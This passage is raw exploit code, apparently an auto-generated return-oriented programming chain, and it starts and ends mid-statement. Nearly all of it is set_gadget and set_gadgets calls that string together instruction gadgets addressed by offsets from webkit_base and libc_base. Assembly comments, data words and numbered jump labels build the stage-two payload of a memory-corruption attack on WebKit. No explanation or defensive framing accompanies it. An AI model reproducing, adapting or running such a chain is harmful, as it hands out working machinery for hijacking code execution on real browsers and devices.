//movsxd rax, edi libc_base+764760, //pop rsi ropchain+187808, //L3012 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+187856, //L3015 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+187824, //L3013 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 
]); //L3012: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3013: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L3014: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3015: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+226597, //movzx eax, al webkit_base+5507491, //shl rax, 3 libc_base+764760, //pop rsi ropchain+187968, //L3016+8 libc_base+501454, //add rax, rsi libc_base+501611, //mov rax, [rax] libc_base+764760, //pop rsi ropchain+187960, //L3016 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+782311 //pop rsp ]); //L3016: db([0, 0]); // 0x0 set_gadgets([ ropchain+187984, //L3016+24 ropchain+191512, //L3011 libc_base+764760, //pop rsi ropchain+188024, //L3017 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L3017: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L3019: db([4294967292, 4294967295]); // -0x4 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+188144, //L3022 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+188128, //L3020 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L3020: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3022: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi ropchain+188320, //L3025 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+188336, //L3026 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+188288, //L3023 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+188304, //L3024 
webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L3023: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L3024: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3025: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3026: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+188432, //L3028 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+188416, //L3027 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L3027: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3028: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608 //pop rax ]); //L3029: db([10, 0]); // 0xa set_gadget(libc_base+763368,); //pop rcx //L3030: db([10, 0]); // 0xa set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi webkit_base+10973692, //imul rax, rcx libc_base+764760 //pop rsi ]); db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+188616, //L3031 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L3031: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L3033: db([16, 0]); // 0x10 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+188736, //L3036 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+188720, //L3034 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx 
]); //L3034: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3036: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+188816, //L3037 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+188832, //L3038 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L3037: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3038: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+188976, //L3041 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+188944, //L3039 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+188960, //L3040 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L3039: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3040: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3041: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+189064, //L3043 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+764760 //pop rsi ]); //L3042: db([1, 0]); // 0x1 set_gadget(libc_base+759608,); //pop rax //L3043: db([0, 0]); // 0x0 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760 //pop rsi ]); db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+189152, //L3044 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L3044: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L3046: db([16, 0]); // 0x10 set_gadgets([ 
libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+189272, //L3049 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+189256, //L3047 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L3047: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3049: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+189360, //L3050 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+189376, //L3052 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+763368 //pop rcx ]); //L3050: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3052: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+189432, //L3053 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L3053: db([0, 0]); // 0x0 set_gadgets([ webkit_base+20307877, //mov [rax], rcx libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+189624, //L3056 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+189640, //L3057 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+189608, //L3055 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L3055: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3056: db([0, 
0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3057: db([0, 0]); // 0x0 set_gadgets([ libc_base+223440, //mov al, [rdi] libc_base+764760, //pop rsi ropchain+189800, //L3061 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+189768, //L3059 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+189784, //L3060 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L3058: db([24, 0]); // 0x18 set_gadget(webkit_base+3236123,); //pop r9 //L3059: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3060: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3061: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+189856, //L3063 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+144605 //pop rdi ]); //L3063: db([0, 0]); // 0x0 set_gadgets([ libc_base+478984, //sar edi, cl libc_base+764760, //pop rsi ropchain+189984, //L3065 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+190000, //L3066 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+189968, //L3064 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L3064: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L3065: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3066: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+190160, //L3070 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+190128, //L3068 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi 
ropchain+190144, //L3069 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L3067: db([24, 0]); // 0x18 set_gadget(webkit_base+3236123,); //pop r9 //L3068: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3069: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3070: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+190216, //L3072 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+144605 //pop rdi ]); //L3072: db([0, 0]); // 0x0 set_gadgets([ libc_base+478984, //sar edi, cl libc_base+764760, //pop rsi ropchain+190344, //L3074 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+190360, //L3075 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+190328, //L3073 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L3073: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L3074: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3075: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+190520, //L3079 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+190488, //L3077 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+190504, //L3078 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L3076: db([24, 0]); // 0x18 set_gadget(webkit_base+3236123,); //pop r9 //L3077: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3078: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3079: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+190576, 
//L3081 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+144605 //pop rdi ]); //L3081: db([0, 0]); // 0x0 set_gadgets([ libc_base+478984, //sar edi, cl libc_base+764760, //pop rsi ropchain+190704, //L3083 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+190720, //L3084 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+190688, //L3082 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L3082: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L3083: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3084: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+190816, //L3086 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+190800, //L3085 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L3085: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3086: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608 //pop rax ]); //L3087: db([48, 0]); // 0x30 set_gadget(libc_base+763368,); //pop rcx //L3088: db([48, 0]); // 0x30 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+835093, //sub rax, rcx ; sbb rdx, rcx libc_base+764760, //pop rsi ropchain+191040, //L3090 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+191056, //L3091 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi 
libc_base+764760, //pop rsi ropchain+191024, //L3089 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L3089: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3090: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3091: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+191168, //L3092 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+191200, //L3094 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+191184, //L3093 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L3092: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3093: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3094: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+755660, //add rax, rcx libc_base+764760, //pop rsi ropchain+191344, //L3097 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+191328, //L3096 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L3095: db([32, 0]); // 0x20 set_gadget(webkit_base+3236123,); //pop r9 //L3096: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3097: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi ropchain+191408, //L3098 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L3098: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L3100: db([4294967292, 4294967295]); // -0x4 set_gadgets([ libc_base+501454, //add rax, rsi 
webkit_base+3488438, //mov [rax], ecx libc_base+764760, //pop rsi ropchain+191488, //L3102 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L3102: db([0, 0]); // 0x0 set_gadgets([ libc_base+782311, //pop rsp ropchain+191528, //L3101 //L3011: libc_base+782311, //pop rsp ropchain+191544, //L3104 //L3101: libc_base+782311, //pop rsp ropchain+185640, //L2957 //L3104: libc_base+764760, //pop rsi ropchain+191584, //L3105 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L3105: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L3107: db([4294967292, 4294967295]); // -0x4 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+191704, //L3110 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+191688, //L3108 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L3108: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3110: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi ropchain+191880, //L3113 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+191896, //L3114 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+191848, //L3111 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+191864, //L3112 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L3111: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L3112: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3113: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3114: db([0, 0]); // 0x0 
set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+192056, //L3118 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+192024, //L3116 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+192040, //L3117 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L3115: db([32, 0]); // 0x20 set_gadget(webkit_base+3236123,); //pop r9 //L3116: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3117: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3118: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi ropchain+192176, //L3119 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+192208, //L3121 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+764760, //pop rsi ropchain+192192, //L3120 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L3119: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3120: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3121: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+192312, //L3122 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+192328, //L3123 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+568675 //pop r8 ]); //L3122: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3123: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 
4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+192448, //L3124 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+192432, //L3125 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+759608 //pop rax ]); //L3125: db([0, 0]); // 0x0 set_gadget(libc_base+782311,); //pop rsp //L3124: db([0, 0]); // 0x0 set_gadgets([ libc_base+764760, //pop rsi ropchain+192536, //L3127 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+764760, //pop rsi ropchain+192520, //L3126 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L3126: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3127: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+192640, //L3128 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+192656, //L3129 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+568675 //pop r8 ]); //L3128: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3129: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+192776, //L3130 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+192760, //L3131 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+759608 //pop rax ]); //L3131: db([0, 0]); // 0x0 set_gadget(libc_base+782311,); //pop rsp //L3130: db([0, 0]); // 0x0 //__out_rev: set_gadget(libc_base+764760,); //pop rsi db([8, 0]); 
// 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+192848, //L3133 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 webkit_base+568675 //pop r8 ]); //L3133: db([0, 0]); // 0x0 set_gadgets([ libc_base+426295, //mov [rdi], rax libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+192912, //L3135 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 webkit_base+568675 //pop r8 ]); //L3135: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([16, 0]); // 0x10 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L3136: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L3138: db([32, 0]); // 0x20 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+193080, //L3141 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+193064, //L3139 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L3139: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3141: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+193168, //L3142 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+193184, //L3144 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L3142: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3144: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L3145: db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+501454, //add rax, rsi webkit_base+20307877, //mov [rax], rcx libc_base+731401, //mov rax, r8 libc_base+764760 //pop rsi ]); //L3147: db([72, 0]); // 0x48 set_gadgets([ 
libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+193344, //L3150 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+193328, //L3148 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L3148: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3150: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi ropchain+193520, //L3153 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+193536, //L3154 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+193488, //L3151 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+193504, //L3152 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L3151: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L3152: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3153: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3154: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+193632, //L3156 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+193616, //L3155 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L3155: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3156: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608 //pop rax ]); //L3157: db([1, 0]); // 0x1 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, 
